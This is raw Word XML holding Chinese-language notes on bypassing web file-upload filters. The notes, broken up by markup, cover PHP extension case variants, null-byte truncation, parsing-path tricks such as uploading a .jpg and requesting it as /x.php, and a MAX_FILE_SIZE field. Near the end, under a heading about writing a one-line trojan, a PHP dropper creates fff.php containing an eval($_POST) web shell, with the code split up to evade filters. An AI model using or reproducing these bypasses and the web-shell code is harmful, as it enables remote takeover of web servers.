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65036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65036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65036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Pr="00A50539" w:rsidRDefault="0027598F" w:rsidP="00A50539">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A50539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大小写或</w:t>
      </w:r>
      <w:r w:rsidR="003623CB" w:rsidRPr="00A50539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50539">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后缀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003623CB" w:rsidRPr="00B45539" w:rsidRDefault="003623CB" w:rsidP="00A50539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A50539">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
      <w:r w:rsidR="0059069B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>截断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>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A50539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A50539">
      <w:pPr>
        <w:pStyle w:val="3"/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A50539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A50539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A50539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65036">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:strike/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AsP,pHp,php3-5</w:t>
      </w:r>
      <w:r w:rsidR="0093473B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(</w:t>
      </w:r>
      <w:r w:rsidR="00AC15A6" w:rsidRPr="00B83FC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:strike/>
        </w:rPr>
        <w:t>后面</w:t>
      </w:r>
      <w:r w:rsidR="00AC15A6" w:rsidRPr="00B83FC1">
        <w:rPr>
          <w:strike/>
        </w:rPr>
        <w:t>的没测试</w:t>
      </w:r>
      <w:r w:rsidR="00AC15A6" w:rsidRPr="00B83FC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:strike/>
        </w:rPr>
        <w:t>)pht</w:t>
      </w:r>
      <w:r w:rsidR="00AC15A6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65036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65036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65036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65036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65036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65036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A50539">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA0751">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidR="00802558" w:rsidRPr="00DA0751">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA0751">
        <w:t>x.php</w:t>
      </w:r>
      <w:r w:rsidR="00FB09D1" w:rsidRPr="00DA0751"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</w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00366107" w:rsidRPr="007F1637">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意和下一节第一条的区别</w:t>
      </w:r>
      <w:r w:rsidR="00EB21EC" w:rsidRPr="007F1637">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A62E97" w:rsidRPr="00703883" w:rsidRDefault="00A46280" w:rsidP="00703883">
      <w:pPr>
        <w:ind w:left="840"/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A50539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65036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4579C4" w:rsidP="00610CE8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="1215" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，访问时</w:t>
      </w:r>
      <w:r w:rsidR="00610CE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以“</w:t>
      </w:r>
      <w:r w:rsidR="00610CE8">
        <w:t>/x.php</w:t>
      </w:r>
      <w:r w:rsidR="00610CE8"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65036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65036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65036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/>
    <w:p w:rsidR="00F135F2" w:rsidRPr="00F135F2" w:rsidRDefault="00F135F2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t>注意点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0093473B" w:rsidRDefault="0093473B" w:rsidP="0093473B">
      <w:r>
        <w:tab/>
        <w:t>&lt;input type="hidden" value="100000" name="MAX_FILE_SIZE"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0093473B" w:rsidRDefault="0093473B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93473B" w:rsidRDefault="0093473B" w:rsidP="0093473B">
      <w:r>
        <w:tab/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65036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65036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496139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A50539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 xml:space="preserve">&lt;script language="php"&gt; ...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p w:rsidR="00C74673" w:rsidRDefault="00C74673" w:rsidP="00C74673">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行写一句话马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003963BC" w:rsidRDefault="003963BC" w:rsidP="003963BC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是过滤危险函数时可以上传写一句话马的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003963BC" w:rsidRPr="00523901" w:rsidRDefault="003963BC" w:rsidP="003963BC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00523901">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00523901" w:rsidRPr="00523901">
        <w:t>&lt;?php fputs(fopen('fff.php','w'),'&lt;?p</w:t>
      </w:r>
      <w:r w:rsidR="0077517C">
        <w:t>’.’</w:t>
      </w:r>
      <w:r w:rsidR="00523901" w:rsidRPr="00523901">
        <w:t>hp e</w:t>
      </w:r>
      <w:r w:rsidR="0077517C">
        <w:t>’.’</w:t>
      </w:r>
      <w:r w:rsidR="00523901" w:rsidRPr="00523901">
        <w:t>va</w:t>
      </w:r>
      <w:r w:rsidR="0077517C">
        <w:t>’.’</w:t>
      </w:r>
      <w:r w:rsidR="00523901" w:rsidRPr="00523901">
        <w:t>l($_P</w:t>
      </w:r>
      <w:r w:rsidR="0077517C">
        <w:t>’.’</w:t>
      </w:r>
      <w:r w:rsidR="00523901" w:rsidRPr="00523901">
        <w:t>O</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00523901" w:rsidRPr="00523901">
        <w:t>ST[yzj])?&gt;');?&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003963BC" w:rsidRPr="0052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FB" w:rsidRDefault="006625FB" w:rsidP="00812F18">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="006625FB" w:rsidRDefault="006625FB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FB" w:rsidRDefault="006625FB" w:rsidP="00812F18">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="006625FB" w:rsidRDefault="006625FB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1C08C7C6"/>
    <w:lvl w:ilvl="0" w:tplc="1F6E383E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="2"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="840" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B4CA2F5E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75B1"/>
    <w:rsid w:val="00357CE5"/>
    <w:rsid w:val="003623CB"/>
    <w:rsid w:val="00366107"/>
    <w:rsid w:val="003963BC"/>
    <w:rsid w:val="003A366E"/>
    <w:rsid w:val="003A40BB"/>
    <w:rsid w:val="003E18EE"/>
    <w:rsid w:val="003E4680"/>
    <w:rsid w:val="003F32E5"/>
    <w:rsid w:val="00417A6B"/>
    <w:rsid w:val="004215BD"/>
    <w:rsid w:val="00432041"/>
    <w:rsid w:val="00451D20"/>
    <w:rsid w:val="004579C4"/>
    <w:rsid w:val="00491539"/>
    <w:rsid w:val="00496139"/>
    <w:rsid w:val="004A709F"/>
    <w:rsid w:val="004B4B42"/>
    <w:rsid w:val="004C46CD"/>
    <w:rsid w:val="004E2A19"/>
    <w:rsid w:val="00523901"/>
    <w:rsid w:val="0052560B"/>
    <w:rsid w:val="00546F27"/>
    <w:rsid w:val="0055613D"/>
    <w:rsid w:val="00561F4F"/>
    <w:rsid w:val="0059069B"/>
    <w:rsid w:val="00591A4B"/>
    <w:rsid w:val="005B3550"/>
    <w:rsid w:val="005B76EE"/>
    <w:rsid w:val="005F4019"/>
    <w:rsid w:val="00610CE8"/>
    <w:rsid w:val="00624ECC"/>
    <w:rsid w:val="006625FB"/>
    <w:rsid w:val="00662F85"/>
    <w:rsid w:val="00664120"/>
    <w:rsid w:val="00665036"/>
    <w:rsid w:val="006674E5"/>
    <w:rsid w:val="006B3A59"/>
    <w:rsid w:val="006C3772"/>
    <w:rsid w:val="006D2070"/>
    <w:rsid w:val="006D7B83"/>
    <w:rsid w:val="00703883"/>
    <w:rsid w:val="007059BF"/>
    <w:rsid w:val="00756A5C"/>
    <w:rsid w:val="0077517C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61D4"/>
    <w:rsid w:val="008F1209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50539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107B5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4673"/>
    <w:rsid w:val="00C7689F"/>
    <w:rsid w:val="00C77437"/>
    <w:rsid w:val="00C8063F"/>
    <w:rsid w:val="00C84257"/>
    <w:rsid w:val="00C93D84"/>
    <w:rsid w:val="00C9442C"/>
    <w:rsid w:val="00C950F4"/>
    <w:rsid w:val="00C976EF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65036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65036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A50539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A50539"/>
    <w:rPr>
      <w:bCs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68C-131B-4B5C-97B0-69ADD58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54</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-08-30T02:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-06-22T08:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>